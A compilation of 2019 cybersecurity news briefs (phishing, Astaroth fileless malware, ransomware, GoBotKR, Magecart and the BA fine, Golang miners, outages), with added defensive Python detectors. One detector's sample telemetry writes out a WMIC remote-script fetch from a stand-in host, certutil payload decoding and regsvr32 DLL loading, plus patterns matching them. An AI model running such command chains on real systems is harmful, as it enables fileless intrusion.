Financial services organizations are suffering an increased number of phishing attacks, according to a new report, Mobile Security in Financial Services, published by Wandera.
Researchers analyzed 4.7 million events across a subset of customer devices over a six-month period; for mobile alone, each organization averaged roughly 21,000 events. Phishing accounted for 57% of attacks on financial services organizations, significantly higher than the 42% seen across other industries.
“Phishing attacks are a daily threat for financial services companies and employees need regular training to help identify phishing attacks – not only via email, but also through social media and other messaging platforms. However, given the growing sophistication of phishing campaigns, FS companies can’t rely on awareness training as the only layer of defense. A multi-level approach needs to be adopted at the endpoint and in the network to offer comprehensive protection against phishing,” the report said.
The financial services industry is also at a higher risk of man-in-the-middle attacks (36%), a full 12 points higher than the cross-industry threat of 24%. The heightened number of threats could be the result of public WiFi usage as well as higher than normal travel activity, the report said.
The report also found that one in 20 financial services employees has the lock screen disabled on their device, which has serious ramifications if the device is lost or stolen. Oddly, only 1% of financial services organizations had devices affected by crypto-jacking, lower than the 2.65% detected across other industries.
“In the financial services industry, as in many sectors, the security of client information is the most important asset, so it’s disconcerting to find mobile security still an afterthought,” said Michael Covington, vice president of product strategy at Wandera. “Financial organizations are struggling to keep pace with increasing regulations, rapid cloud migrations and rampant BYOD adoption, among other emerging technology trends, making it crucial that industry security pros work to secure not just the devices, but also the apps installed on them and the data they access."
The UK’s Institute of Information Security Professionals (IISP) has been awarded a prestigious Royal Charter, in a move which could help to attract more people into the industry to combat chronic skills shortages.
The newly named Chartered Institute of Information Security Professionals can now claim to be the authoritative body for the cybersecurity industry in the country. Royal Charters are rarely granted, and only to bodies that are able to prove pre-eminence in their field and who serve the public interest.
Under its new banner, the CIISP will continue its mission to promote knowledge sharing across the profession and develop standards for skills recognition and career development, at home and potentially overseas.
“As the cybersecurity industry continues to grow, professionalization has to be central to its agenda, and the institute’s chartered status will be a key component driving this forward,” said Alastair MacWillson, chair of the Chartered Institute of Information Security Professionals.
“The institute has spent over a decade using uniquely developed frameworks to set standards for skills, experience and roles across the profession and it’s hugely encouraging to see these standards and processes validated by charter incorporation.”
MacWillson also argued that its new status would help the institute attract more applicants into an industry that has been suffering skills shortages for many years.
The global shortfall in information security professionals now stands at nearly three million, including 142,000 in EMEA, and just a quarter (24%) of the workforce are women.
According to a March Tripwire study, 85% of industry professionals polled claimed their IT security department is already understaffed, with only 1% saying they can manage all of their organization’s cybersecurity needs.
A separate poll for Infosecurity Europe in the same month found that over half (52%) of IT and security professionals believe skills shortages are putting their business at an increased risk of attack.
Microsoft has warned of a new fileless malware attack campaign that completely “lives off the land” in a bid to escape detection.
Andrea Lelli of the computing giant’s Microsoft Defender ATP Research Team first detected the Astaroth campaign after noticing a May-June spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script.
This is a commonly used technique in fileless malware attacks and so it proved this time, with attackers spreading the info-stealing malware via a spear-phishing link to a .LNK file.
“All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.”
During the entire process, no file is run that isn’t a legitimate system tool, which could make it difficult for legacy security solutions to detect.
Heuristics and behavioral monitoring capabilities are key to spotting such fileless threats as they focus on detecting anomalous behavior rather than looking for signatures or executables, Lelli concluded.
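The chain Microsoft describes (WMIC running a script, certutil decoding Base64 payloads, regsvr32 loading the resulting DLL) consists entirely of legitimate signed binaries, so the detection has to be behavioural: correlate several stages on one host rather than alert on any single tool. The following is an added example of that correlation, not Microsoft's detection logic; the process-creation events are constructed, the field names are an assumption to be mapped onto your EDR or Sysmon schema, and the "DLL loaded from a user-writable path" heuristic for regsvr32 is the author's, not something the report states.

```python
"""Flag the living-off-the-land chain (WMIC -> certutil -decode -> regsvr32
loading a DLL from a user-writable path) in process-creation events.
Added example, not Microsoft's detection logic; events are constructed."""
import re
from collections import defaultdict

# Constructed process-creation events (no real telemetry).
EVENTS = [
    {"host": "ws01", "image": "explorer.exe",
     "cmd": r'"C:\Users\a\Downloads\invoice.lnk"'},
    {"host": "ws01", "image": "wmic.exe",
     "cmd": r'wmic os get /format:"https://example.invalid/x.xsl"'},
    {"host": "ws01", "image": "certutil.exe",
     "cmd": r'certutil -decode C:\Users\a\AppData\Local\Temp\p1.txt C:\Users\a\AppData\Local\Temp\p1.dll'},
    {"host": "ws01", "image": "regsvr32.exe",
     "cmd": r'regsvr32 /s C:\Users\a\AppData\Local\Temp\p1.dll'},
    # Benign administrative use of the same tools on another host.
    {"host": "ws02", "image": "certutil.exe",
     "cmd": r'certutil -verify -urlfetch C:\certs\corp.cer'},
    {"host": "ws02", "image": "regsvr32.exe",
     "cmd": r'regsvr32 /s C:\Windows\System32\scrrun.dll'},
]

# Each stage is (name, tool image, command-line pattern).  The user-writable
# path heuristic for regsvr32 is an assumption of this example.
STAGES = [
    ("wmic_script", "wmic.exe", re.compile(r"/format:", re.I)),
    ("certutil_decode", "certutil.exe", re.compile(r"(^|\s)-decode\b", re.I)),
    ("regsvr32_userpath", "regsvr32.exe",
     re.compile(r"\\(Users|Temp|AppData|ProgramData)\\", re.I)),
]

def classify(event):
    """Return the stage name an event matches, or None."""
    image = event["image"].lower()
    for name, tool, pattern in STAGES:
        if image.endswith(tool) and pattern.search(event["cmd"]):
            return name
    return None

def detect_chains(events, min_stages=2):
    """Hosts on which at least `min_stages` distinct stages were seen.
    A lone certutil -decode is common admin noise; two or more stages of
    the chain on one host is the behavioural signal worth alerting on."""
    seen = defaultdict(set)
    for ev in events:
        stage = classify(ev)
        if stage:
            seen[ev["host"]].add(stage)
    return {h: sorted(s) for h, s in seen.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for host, stages in detect_chains(EVENTS).items():
        print(f"ALERT {host}: {', '.join(stages)}")
```

The final step, injection into Userinit, is not visible in process-creation telemetry at all; catching it needs memory or thread-injection monitoring, which is why the report stresses behavioural capabilities over file scanning.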
Fileless malware and “living off the land” techniques have been around for several years, although they’re being used with increasing frequency today.
Malwarebytes claimed that such attacks comprised around 35% of total threats in 2018, and are 10 times more likely to succeed than file-based attacks.
Earlier this year, Trend Micro revealed a massive 819% increase in detections of fileless threats between August 2017 and December 2018. It claimed that sandboxing, as well as monitoring behavioral indicators and traffic, can help the white hats to combat this growing threat.
Over a quarter of UK firms have suffered a ransomware attack over the past year, a major increase on figures from 2016, according to new research released by Databarracks.
The business continuity provider shared data from its upcoming Data Health Check survey, based on interviews with 400 IT decision makers.
It revealed that 28% of UK organizations have been hit by ransomware over the past 12 months. This is slightly lower than the peak of 29% in 2017, the year WannaCry hit, but much higher than the 2016 figure of 16%.
Databarracks managing director, Peter Groucutt, urged firms to formulate effective incident response plans, including recovery from backup.
“A ransomware attack will ultimately leave a business with two decisions: recover your information from a previous backup or pay the ransom. But even if a ransom is paid, it’s not certain your data will be returned. The only way to be fully protected is to have historic backup copies of your data,” he argued.
“When recovering from ransomware, your aims are to minimize both data loss and IT downtime. Outright prevention is not viable, so organizations should focus on organizing their defensive and preventative strategies to reduce the impact of an attack.”
It’s not just the UK that has seen an increase in ransomware attacks of late. In the US, several Florida cities have been hit, with two of them agreeing to pay the hackers hundreds of thousands of dollars to get their data back.
Although ransomware attacks on consumers decreased 33% year-on-year in Q1 2019, those against corporates surged by over 500%, according to Malwarebytes.
“The incident response team must have the authority to make large-scale, operational decisions quickly. This includes being able to take systems offline to prevent the spread of infection,” explained Groucutt.
“Once isolated and contained, you must find when the ransomware installation occurred to be able to restore clean data from before the infection. When the most recent, clean data is identified you can begin a typical recovery, restoring data and testing before bringing systems back online again.”
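Groucutt's procedure, finding when the infection began and restoring the newest clean copy from before it, is worth showing as code because the hard part is deciding which backup is clean. The block below is an added example, not Databarracks' tooling: the file listing and backup catalogue are constructed, the ransom extensions and note names are assumptions to be replaced with the real sample's, and it assumes file modification times were not tampered with (some families alter them, in which case you fall back to log timestamps).

```python
"""Estimate when a ransomware infection started and pick the newest backup
taken before it.  Added example, not Databarracks' tooling; the listing and
backup catalogue are constructed."""
import math
import re
from datetime import datetime, timedelta

RANSOM_EXTENSIONS = {".locked", ".encrypted", ".crypt"}   # assumption; add the real sample's
RANSOM_NOTE = re.compile(r"(how.?to.?decrypt|readme.*decrypt|restore.*files)", re.I)
HIGH_ENTROPY = 7.5   # bits per byte; ciphertext is close to 8.0

# Constructed listing: (path, modification time, first bytes of content).
FILES = [
    ("/srv/share/q2-report.xlsx.locked", datetime(2019, 7, 2, 9, 3), bytes(range(256)) * 4),
    ("/srv/share/HOW_TO_DECRYPT.txt", datetime(2019, 7, 2, 9, 1), b"Your files are encrypted. Pay..."),
    ("/srv/share/minutes.docx", datetime(2019, 6, 30, 17, 45), b"PK\x03\x04" + b"\x00" * 200),
]
# Constructed backup catalogue (snapshot times), deliberately unsorted.
BACKUPS = [
    datetime(2019, 7, 1, 2, 0),
    datetime(2019, 7, 2, 2, 0),
    datetime(2019, 7, 2, 10, 0),   # taken after the infection: contains encrypted data
    datetime(2019, 6, 30, 2, 0),
]

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def is_suspect(path: str, head: bytes) -> bool:
    """Ransom extension, ransom-note name, or encrypted-looking content."""
    name = path.rsplit("/", 1)[-1]
    ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return (ext in RANSOM_EXTENSIONS
            or bool(RANSOM_NOTE.search(name))
            or shannon_entropy(head) >= HIGH_ENTROPY)

def infection_start(files):
    """Earliest modification time among suspect files, or None if none found."""
    times = [mtime for path, mtime, head in files if is_suspect(path, head)]
    return min(times) if times else None

def clean_restore_point(backups, start, margin=timedelta(hours=1)):
    """Newest backup taken at least `margin` before the infection started.
    None means no backup predates the attack: the two-way decision
    Groucutt describes then collapses to one option."""
    candidates = [b for b in backups if b <= start - margin]
    return max(candidates) if candidates else None

if __name__ == "__main__":
    start = infection_start(FILES)
    print("infection started:", start)
    print("restore from:", clean_restore_point(BACKUPS, start))
```

The safety margin matters: encryption usually runs for a while before the first ransom note appears, so a backup that completed minutes before the earliest suspect timestamp may already contain encrypted files, and the restored data must still be tested before systems go back online.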
The Department of Energy (DOE) engaged in conversations with industry partners in order to advance the cybersecurity of industrial control systems in the nation’s critical infrastructure, including power utilities and pipelines, according to FedScoop and E&E News.
“Private entities and key agencies formed a consortium over concerns industrial control systems (ICS) are increasingly being targeted by nation-states, hacktivists and advanced persistent threats, but such incidents aren’t being discussed,” FedScoop reported.
Since meetings took place over a week ago, a team of industry leaders have set to work with the focus of delivering a report and key recommendations by the end of July, according to Jason Haward-Grau, CISO at PAS Global.
“The DOE’s driver is enabling a safer and more secure pipeline infrastructure, there is no expectation that the accountability will change from the TSA,” said Haward-Grau. “The EU response to both the risks and the need to protect the critical infrastructure space is becoming acknowledged as a solid mechanism for governments to build upon their varied security foundations to establish the framework for cybersecurity in the operational security arena. There are more countries (and even states in the US) looking to establish the same principles, practices that are already being deployed in the EU.”
As nation states continue to openly demonstrate their offensive cyber capabilities, governments and private industry alike are increasingly concerned about malicious actors targeting critical infrastructure. Given the nature and importance of ICS, they sit high on the list of targets, which is driving the growing desire to protect them.
“Coupled with the drive toward digitization of the operational technology (OT) end points, the potential attack surface for OT is growing wider and presents a more attractive target as the opportunity to ‘play the odds’ means the defenders have to be 100% successful to keep their environments secure, whereas the attackers just need to get lucky once,” said Haward-Grau.
“There is an increasing challenge in ensuring that we have the right skilled resources available to drive the improved security programs as not only is there a major shortage in IT, there is a lack in OT and the difference between OT and IT is compounding the challenge.”
A malware campaign has been targeting Korean TV torrent websites, according to researchers at ESET.
The malware, which targets South Korean users, reportedly grants attackers remote control of compromised devices. ESET detects it as a variant of Win64/GoBot2 and has dubbed this variant GoBotKR; the actors behind it are building a network of bots that can then be used to perform DDoS attacks of various kinds, according to the press release.
“The attackers behind this campaign try to trick users into executing the malware by booby-trapping the contents of the torrents with malicious files that have deceptive filenames, extensions and icons,” says ESET researcher Zuzana Hromcová, who analyzed the malware. “Directly opening the intended MP4 file will not result in any malicious action. The catch here is that the MP4 file is often hidden in a different directory, and users might first encounter the malicious file mimicking it.”
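The lure Hromcová describes relies on names rather than exploits: an executable or shortcut carries the episode's name, a media extension buried before the real one, and the genuine MP4 sits somewhere else in the torrent. A first-pass check over the torrent's file listing catches most of that. The block below is an added example, not ESET's analysis tooling; the listing is constructed, and because icons live inside the .lnk or .exe itself they cannot be checked from names alone.

```python
"""Scan a downloaded torrent's file listing for executables dressed up as
media.  Added example, not ESET's tooling; the listing is constructed."""
import os

MEDIA_EXT = {".mp4", ".mkv", ".avi", ".mov", ".srt", ".smi"}
EXEC_EXT = {".exe", ".scr", ".lnk", ".bat", ".cmd", ".com", ".pif", ".js", ".vbs", ".hta"}

# Constructed: the real episode sits in a sub-folder; two decoys sit at the top level.
PADDED = "Drama.E01.720p.mp4" + " " * 40 + ".exe"   # whitespace pushes the real extension out of view
LISTING = [
    "Drama.E01.720p.mp4.lnk",
    PADDED,
    "extras/Drama.E01.720p.mp4",
    "Drama.E01.720p.srt",
    "cover.jpg",
]

def reasons_for(path, real_names):
    """Why a single entry is suspicious; empty list if it is not."""
    name = os.path.basename(path)
    stem, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in EXEC_EXT:
        return []
    reasons = ["executable"]
    visible = stem.rstrip()                      # what the user sees before any padding
    if os.path.splitext(visible)[1].lower() in MEDIA_EXT:
        reasons.append("double_extension")
    if visible != stem:
        reasons.append("padded_name")
    if visible in real_names:
        reasons.append("mimics_real_file")       # a genuine file of that name exists elsewhere
    return reasons

def scan(listing):
    """Map of suspicious path -> reasons, for every entry in the torrent."""
    real_names = {os.path.basename(p) for p in listing
                  if os.path.splitext(p)[1].lower() not in EXEC_EXT}
    flagged = {}
    for path in listing:
        reasons = reasons_for(path, real_names)
        if reasons:
            flagged[path] = reasons
    return flagged

if __name__ == "__main__":
    for path, reasons in scan(LISTING).items():
        print(f"DO NOT OPEN {path!r}: {', '.join(reasons)}")
```

The "mimics_real_file" reason is the one that most directly matches the campaign: the attackers ship the real video so the download looks legitimate, and the decoy borrows its name.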
Though not very technically complex, the malware collects system information about the compromised computer after being executed. According to the researchers, the information collected includes network configuration, OS version information and CPU and GPU versions along with a list of installed antivirus software.
“This information is sent to a C&C server, which helps the attackers determine which bots should be used in the respective attacks. All C&C servers that we extracted from the analyzed malware samples are hosted in South Korea and registered by the same person,” said Hromcová.
GoBotKR’s evasion techniques are notable from a researcher’s perspective, said Hromcová. One in particular: when the malware scans the running processes on the compromised system, it terminates itself if it finds any of the security or analysis products it checks for.
“Overall, the modifications show us that the attackers customized the malware for a specific audience, while taking extra effort to remain undetected in their campaign” said Hromcová.
Due to “unforeseen circumstances,” Hillary Clinton has reportedly withdrawn from delivering the keynote speech at the 2019 FireEye Cyber Defense Summit, according to news from the Daily Caller.
Infosecurity has contacted FireEye and Clinton’s office to confirm that the former US secretary of state will no longer be speaking at the cybersecurity event. Clinton is not listed among the 2019 speakers for the event, and a detailed agenda including keynote details is not yet available on the conference website.
Clinton was invited to participate in a Q&A discussion with FireEye CEO, Kevin Mandia, “on the geopolitical landscape and its implications for global cybersecurity today. Secretary Clinton has been a practicing attorney and law professor, an advocate of internet freedom, First Lady, and US Senator from New York, in addition to serving as the 67th United States Secretary of State,” according to a May 30 press release.
“Differences among nations today, driven by friction in geopolitics, economics, security and technology, are having a significant impact on global cyber conflict. Secretary Clinton’s extensive knowledge of foreign policy, her firsthand experience on the front lines of diplomacy, and her understanding of the challenges facing open, democratic societies give her a unique perspective on some of the most pressing conversations shaping our world today,” said Mandia.
The announcement that Clinton would deliver the keynote drew much comment on social media, some of it mocking, while others said they had cancelled their registrations.
“Just cancelled my plans to go to #FireEyeSummit. No way to trust a cyber company that thinks it is a good idea for a govt official that is willing to run a private, unprotected server, out of her home is a keynote speaker. Her disposal techniques are umm,” one person tweeted.
If Clinton has officially withdrawn, the news has remained tightly under wraps. Despite critics expressing their dissatisfaction at the news that she would be speaking, Twitter has remained very quiet since the Daily Caller reported the news on July 4.
Security researchers have discovered another major digital skimming campaign, this time compromising over 960 e-commerce sites in just a day.
Sanguine Security, which produces a malware scanning tool for popular e-commerce software platform Magento, revealed the findings in a tweet on Friday.
It described the discovery as “the largest automated campaign to date” – with 962 sites infected with the infamous Magecart code.
That is far higher than the previous record of around 700 online stores in a single campaign, and the fact that the attacks took place within a 24-hour period, against victims located around the world, indicates a highly automated operation.
It’s believed the attacks could be the result of hackers exploiting a vulnerability in Magento.
In March, for example, a critical SQL injection flaw was disclosed that can lead to remote code execution. Although the vendor has patched it, stores that have not applied the fix may still be exposed.
The destructive power of Magecart has been plain to see over recent months. Just today, airline BA was fined over £183m for failing to protect its web infrastructure from a Magecart attack last year, leading to the compromise of personal data on around 500,000 customers.
A Magento flaw appears to be the most likely explanation here, giving attackers easy access to hundreds of sites running an insecure version of the CMS software.
Sanguine Security has published the new version of the skimming code on GitHub Gist, although confirmed details on how this most recent attack worked have yet to emerge.
Cyber-attacks on UK businesses hit an all-time high in the second quarter of 2019, averaging one every 50 seconds, according to Beaming.
The business ISP analyzed traffic for its customers during the period and found them to be on the receiving end of 146,491 attempted attacks each, on average. That’s 179% higher than the same period in 2018, when firms faced down 52,596 attacks on average.
IoT devices and file sharing services were most frequently targeted, hit by 17,737 and 10,192 attacks respectively during the quarter.
This chimes somewhat with a FireEye report from last month, which revealed a dramatic increase in email attacks that abuse file-sharing services to deliver malware. OneDrive went from barely appearing in such attacks in Q4 2018 to being used in over 60% of them by Q1 2019, it claimed.
Attackers favor file-sharing services in their phishing emails because links to those legitimate, well-established domains pass the initial domain reputation checks made by security tools.
Beaming also identified over 371,000 unique IP addresses used to launch cyber-attacks in Q2 2019: a plurality were traced back to China, with significant activity also originating in Taiwan, Brazil, Egypt and the US.
However, this is more of an indication of where the most compromised PCs are, rather than necessarily the geographical location of the attackers themselves.
Beaming managing director, Sonia Blizzard, argued that companies of all sizes are under attack.
“The majority of cyber-attacks on businesses are indiscriminate, malicious code that trawls the web seeking to exploit any weak point in cybersecurity systems. A single breach can be catastrophic to those involved,” she added.
“We do lots at a network level to minimize the threat of online attacks, but businesses need to take the threat seriously, educate employees and put in place measures such as managed firewalls to ensure they don’t expose themselves to undue risk.”
The Anti-Fraud Technology Benchmarking Report, published by the ACFE, assessed data from more than 1,000 ACFE members on their organizations’ use of technology to fight fraud. It found that while only 13% of businesses currently use AI and machine learning to detect or deter fraudulent activity, another 25% plan to do so in the next year or two.
Other key findings discovered that 26% of organizations are using biometrics as part of their anti-fraud programs, with another 16% expecting to deploy biometrics by 2021, while more than half of respondents (55%) plan to increase their anti-fraud tech budgets over the next two years.
“As criminals find new ways to exploit technology to commit schemes and target victims, anti-fraud professionals must likewise adopt more advanced technologies to stop them,” said Bruce Dorris, JD, CFE, CPA, president and CEO of the ACFE. “However, which technologies are most effective in helping organizations manage rising fraud risks? The answer to this question can be crucial in successfully implementing new anti-fraud technologies.”
Laurent Colombant, continuous controls and fraud manager at SAS, added: “The tools available for fraud prevention are now more intelligent than ever. We’re no longer restricted to merely reacting to fraud after it happens – with the right AI-enabled tools in place, anti-fraud teams can now begin to intelligently predict potential danger spots and flag up early warning signs to ensure efforts are co-ordinated and effective.
“The emergence of AI, machine learning and predictive modelling is helping investigators to pre-emptively detect fraudulent activity, allowing them to stay ahead of the increasingly sophisticated techniques being employed by criminals.”
British Airways (BA) has been hit by a record £183m GDPR fine after failing to prevent a digital skimming attack last year.
UK regulator the Information Commissioner’s Office (ICO) said the £183.39m penalty was levied due to “poor security arrangements” at the carrier, leading to the compromise of personal data on around half a million customers.
“People’s personal data is just that – personal. When an organization fails to protect it from loss, damage or theft it is more than an inconvenience,” said information commissioner, Elizabeth Denham.
“That’s why the law is clear – when you are entrusted with personal data you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”
The fine is the biggest ever levied by the ICO, publicly at least, but still amounts only to around 1.5% of the airline’s global annual turnover as of 2017 – far less than the maximum 4% allowable.
That said, BA will be appealing to the ICO. Chairman and CEO, Alex Cruz, claimed the company responded quickly to the incident and that it has found “no evidence” of the data being used in follow-on fraud.
However, security researchers claimed to have found the stolen personal information up for sale online just a week after the incident.
The attack involved an increasingly popular form of digital skimming code known as Magecart, which was inserted covertly onto the BA site to harvest user card information without its knowledge.
The data stolen included log-in, payment card and travel booking details as well as name and address information, according to the ICO.
Raef Meeuwisse, ISACA expert speaker and author, argued that commentators should refrain from passing judgement until the outcome of BA’s appeal is known.
“This fine is a timely wake-up call for enterprises that under-investment, especially in cybersecurity, is a false economy. It is also a reminder that you cannot just leave mission-critical third-party activities with anything less than mission-critical levels of verified security,” he said.
“However, I think we need to await the outcome of any appeal and what the final amount of the fine really is. If the amount reduces substantially during the appeals process, then the executives in other organizations who are just about to raise the risk-levels and investment in both data privacy and security will probably breathe a sigh of relief.”
The largest forensic services provider in the UK, Eurofins Scientific, has reportedly paid a ransom to criminals after its IT systems were disrupted in a cyber-attack. The amount of the ransom has not been disclosed, though BBC News reported that the attacks also resulted in the British police suspending its work with the global testing company.
Law enforcement agencies have refrained from sending new samples to Eurofins for analysis, according to reports. The Crown Prosecution Service told the BBC: “We are working to make sure all hearings remain fair and based on reliable evidence. While investigations are ongoing, prosecutors will assess the impact on a case-by-case basis. Cases where forensic evidence does not play a major role will continue as usual if all parties agree. If test results provided by Eurofins are central, we will seek to adjourn cases for the shortest possible period.”
Given that the investigation of the attack remains ongoing, Eurofins is refraining from commenting.
“This kind of attack was inevitable. While many security experts warn about paying ransoms or entering into negotiations, the answer in reality comes down to simple economics,” said Barry Shteiman, vice president of research and innovation at Exabeam.
“If the downtime caused by data being unavailable, or by the backup restoration process, is more expensive than paying the ransom, then organizations should pay. Equally, if giving up on the encrypted data has a higher cost in lost revenue or intellectual property than remediation, then you can also see why an organization would pay the ransom. Of course, this is a last resort, if all other options have been exhausted,” Shteiman continued.
Still, ransomware is only one type of attack that organizations need to protect against, said Derek James, regional director of EMEA for WhiteHat Security. “You need to protect against all threats, not one specific one. For the companies that are truly concerned about ransomware, in addition to vulnerability assessments, they can follow some easy industry best practices. Backing up data and using up-to-date encryption will help negate some of the risk of ransomware.”
A survey of 320 IT experts conducted by Gurucul found that one in 10 respondents admitted they would try to take as much company information with them as possible before they left their jobs. In addition, the survey found that 15% of participants would delete files or change passwords upon exiting.
While a number of organizations have invested in technologies to help detect and defend against external attackers, many companies are starting to better understand the risks from insider threats, which a recently published whitepaper said may actually be a larger issue.
According to the report, insider attacks are more difficult to detect and prevent than external ones, with 91% of respondents in a similar survey of IT and security professionals saying they feel vulnerable to both malicious and accidental insider threats.
“Gurucul mitigates these risks by employing behavioral analytics,” said Craig Cooper, COO of Gurucul. “By combining user and entity behavior analytics, and identity analytics, companies can not only monitor, detect and remove excess access before it is too late, but they can also monitor employee actions by detecting unusual or risky behavior. By detecting when users are acting in ways that contradict their normal behavior and job function, our customers are able to intervene.”
At issue is that teams are overloaded with identities and entitlements because of the manual processes built into static identity management rules and roles. “It is more common than not that users inside the perimeter have access to information they do not need for their job. This gives them the capability to perform abusive tasks within the company. However, insider threats are not always caused by users within the organization. They can also occur when credentials of employees are shared or compromised, which often goes undetected,” wrote Gurucul’s Alison DeNisco Rayome in a July 2 blog post.
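The two signals Cooper describes, a user acting against their own normal behaviour and a user reaching outside their job function, can be checked with nothing more than per-user daily access counts and a role-to-resource map. The following is an added example of that logic, not Gurucul's product; the users, role map and access events are constructed, and the 3-sigma threshold and seven-day minimum baseline are assumptions.

```python
"""Flag a user whose file access departs from their own baseline or from
their role.  Added example, not Gurucul's logic; all data is constructed."""
import statistics
from collections import defaultdict

# Constructed: which shares each role legitimately uses.
ROLE_SHARES = {"sales": {"crm", "pricelists"}, "eng": {"repos", "designs"}}
USERS = {"alice": "sales", "bob": "eng"}

# Constructed daily access events: (user, day, share, files_touched).
EVENTS = [("alice", d, "crm", n) for d, n in
          enumerate([22, 25, 20, 27, 24, 23, 26, 21, 25, 24, 22, 26, 23, 25], 1)]
EVENTS += [("bob", d, "repos", n) for d, n in
           enumerate([30, 32, 29, 31, 30, 33, 28, 31, 30, 32, 29, 31, 30, 32], 1)]
# Day 15: alice pulls far more than usual and reaches into an engineering share.
EVENTS += [("alice", 15, "crm", 400), ("alice", 15, "designs", 35), ("bob", 15, "repos", 31)]

MIN_BASELINE_DAYS = 7   # assumption: fewer days than this is not a baseline

def daily_totals(events):
    totals = defaultdict(lambda: defaultdict(int))
    for user, day, _share, n in events:
        totals[user][day] += n
    return totals

def anomalies(events, z=3.0):
    """Sorted list of (user, day, reason) findings."""
    findings = set()
    # Role violations: any share outside the user's role, regardless of volume.
    for user, day, share, _n in events:
        if share not in ROLE_SHARES.get(USERS.get(user), set()):
            findings.add((user, day, f"outside_role:{share}"))
    # Volume spikes: compare each day with the user's other days (leave-one-out),
    # so one huge day does not inflate its own baseline and hide itself.
    for user, per_day in daily_totals(events).items():
        for day, count in per_day.items():
            others = [c for d, c in per_day.items() if d != day]
            if len(others) < MIN_BASELINE_DAYS:
                continue
            mean = statistics.fmean(others)
            spread = max(statistics.pstdev(others), 1.0)   # floor so a flat baseline still works
            if count > mean + z * spread:
                findings.add((user, day, "volume_spike"))
    return sorted(findings)

if __name__ == "__main__":
    for user, day, reason in anomalies(EVENTS):
        print(f"day {day:>2} {user:<6} {reason}")
```

The per-user baseline is what distinguishes this from a static rule: bob's 31 files on day 15 is normal for bob, while alice's 435 is fifteen times her usual volume. Pairing the volume signal with HR data (a resignation date, for instance) is how the "take as much as possible before leaving" case in the survey gets prioritised.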
Though not often seen in the threat landscape, Golang-based crypto-mining malware was first identified in mid-2018 and activity has continued throughout 2019. Researchers noted that the latest operation, which has infected an estimated several thousand machines, began around June 10, with the first exploit requests identified around June 16.
Using the CryptoNight algorithm to mine Monero (XMR), the attacker has earned less than $2,000, a figure based only on the wallets F5 Labs observed the miners using. The researchers added that the attacker may have several wallets used by different parts of the botnet.
“F5 researchers detected malicious requests targeting vulnerabilities in ThinkPHP (CVE-2019-9082 and CVE-unassigned), Atlassian Confluence (CVE-2019-3396), and Drupal (CVE-2018-7600) also known as Drupalgeddon2,” the report said.
The malware campaign reportedly propagates using seven different methods, which include four web application exploits, SSH credentials enumeration, Redis database passwords enumeration, and an attempt to connect other machines through the use of discovered SSH keys.
“Some of these vulnerabilities are common targets, however, the delivered malware in this campaign was written in Go (Golang), a newer programming language not typically used to create malware,” the researchers wrote.
As Golang malware is not yet widely detected by anti-virus software, malicious actors have started adopting the language. “Although the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware. One of the earlier Golang samples was analyzed and published beginning of January 2019,” the report said.
To host the initial bash script, the attackers reportedly use pastebin.com, an online clipboard service. According to the report, the malware itself is hosted on an already compromised Chinese e-commerce website. Combined with additional indicators, such as the clipboard service and GitHub usernames, researchers suspect this could be the work of a Chinese-speaking attacker.
Unified Access Management company OneLogin has announced that Joanne Bradford has become the newest member of its board of directors.
Bradford will bring over 30 years of marketing and operations experience to OneLogin’s board, having previously served in CMO and COO leadership positions for companies such as Microsoft, Yahoo, SoFi and Pinterest, as well as board positions for Wave, Adaptly and Comscore.
“Joanne's deep expertise in integrated mass consumer marketing at some of the most well-known and biggest tech companies in the world will be critical for OneLogin at this stage of our accelerating growth,” said Brad Brooks, CEO of OneLogin. “One of many things I love about having Joanne on board is her insights coming by way of looking at things from the end-user perspective. This intuition will play an important role as we continue our momentum capitalising on the multi-billion-dollar market opportunity for our Unified Access Management platform.”
Bradford said: “I am joining the OneLogin’s board during a critical time of exponential momentum and interest in its UAM solution – a solution that every company requires. Enterprises everywhere need OneLogin to navigate the changing landscape of cloud adoption, digital transformation, and cybersecurity. I'm honored to be joining this exceptional team and look forward to much-anticipated success.”
Users worldwide were frustrated at being unable to see images on Facebook, Instagram and WhatsApp this week because of glitches in Facebook’s platform, which the company said were triggered by “routine maintenance.”
Instead of pictures and videos, users were shown grey boxes containing text describing what was in the image. That text is believed to be the output of the company’s image analysis software.
This outage is not the only recent failure for Facebook-owned services. In March, Facebook and Instagram suffered the longest disruption in the company’s history: a 14-hour outage that Facebook attributed to a server configuration change.
Speaking on its latest outage, the company tweeted: “We’re aware that some people are having trouble uploading or sending images, videos and other files on our apps. We're sorry for the trouble and are working to get things back to normal as quickly as possible. #facebookdown.”
It later added: “Earlier today, some people and businesses experienced trouble uploading or sending images, videos and other files on our apps and platforms. The issue has since been resolved and we should be back at 100% for everyone. We're sorry for any inconvenience.” However, some users continued to complain of not being able to see images afterwards.
Other companies also faced outages this week. Cloudflare was brought down by a “bad software deployment” while users have complained that Apple's iCloud has also been down.
However, users also noticed that their images were being tagged, which was the result of the company's artificial intelligence image analysis. The description of these images is meant to support visually impaired users, however, some users couldn't help but feel 'creeped out' by seeing how accurate the description of the image was.
For Facebook, though, the damage might have been done from the outage. According to Bigbom, a decentralized advertising ecosystem company, Downdetector processed over 7.5 million reports from end users during the outage. Interestingly, the company tweeted that this latest outage was the “company's biggest one” in years.
How the outage affected advertisers who use the platform is unknown, but Bigbom believes thousands of dollars in ad revenue would have been lost.
A post by John Graham-Cumming, CTO of Cloudflare, was published after a roughly 30-minute outage of Cloudflare’s network took down the sites behind it. The issue was caused by a massive spike in CPU utilization across the network, the result of a “bad software deploy.” According to Graham-Cumming, once the deployment was rolled back, service returned to normal.
“This was not an attack (as some have speculated) and we are incredibly sorry that this incident occurred,” writes Graham-Cumming. “Internal teams are meeting as I write performing a full post-mortem to understand how this occurred and how we prevent this from ever occurring again.”
